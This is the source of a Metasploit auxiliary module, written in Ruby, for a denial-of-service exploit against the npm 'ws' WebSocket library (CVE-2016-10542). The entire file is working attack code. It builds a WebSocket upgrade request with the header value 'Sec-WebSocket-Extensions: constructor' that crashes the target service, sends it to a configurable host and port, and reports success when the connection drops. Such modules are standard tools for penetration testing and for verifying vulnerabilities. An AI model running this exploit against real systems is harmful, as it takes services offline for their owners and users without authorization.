## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos def initialize super( 'Name' => 'ws - Denial of Service', 'Description' => %q{ This module exploits a Denial of Service vulnerability in npm module "ws". By sending a specially crafted value of the Sec-WebSocket-Extensions header on the initial WebSocket upgrade request, the ws component will crash. }, 'References' => [ ['CVE', '2016-10542'], ['URL', 'https://nodesecurity.io/advisories/550'], ['CWE', '400'], ], 'Author' => [ 'Ryan Knell, Sonatype Security Research', 'Nick Starke, Sonatype Security Research', ], 'License' => MSF_LICENSE, 'Notes' => { 'Stability' => [CRASH_SERVICE_DOWN], 'SideEffects' => [], 'Reliability' => [] } ) register_options([ Opt::RPORT(3000), OptString.new('TARGETURI', [true, 'The base path', '/']), ]) end def run path = datastore['TARGETURI'] # Create HTTP request req = [ "GET #{path} HTTP/1.1", 'Connection: Upgrade', "Sec-WebSocket-Key: #{Rex::Text.rand_text_alpha(5..14)}", 'Sec-WebSocket-Version: 8', 'Sec-WebSocket-Extensions: constructor', # Adding "constructor" as the value for this header causes the DoS 'Upgrade: websocket', "\r\n" ].join("\r\n") begin connect print_status("Sending DoS packet to #{peer}") sock.put(req) data = sock.get_once(-1) # Attempt to retrieve data from the socket if data =~ /101/ # This is the expected HTTP status code. IF it's present, we have a valid upgrade response. print_error('WebSocket Upgrade request Successful, service not vulnerable.') else fail_with(Failure::Unknown, 'An unknown error occurred') end disconnect print_error('DoS packet unsuccessful') rescue ::Rex::ConnectionRefused print_error("Unable to connect to #{peer}") rescue ::Errno::ECONNRESET, ::EOFError print_good("DoS packet successful. #{peer} not responding.") end end end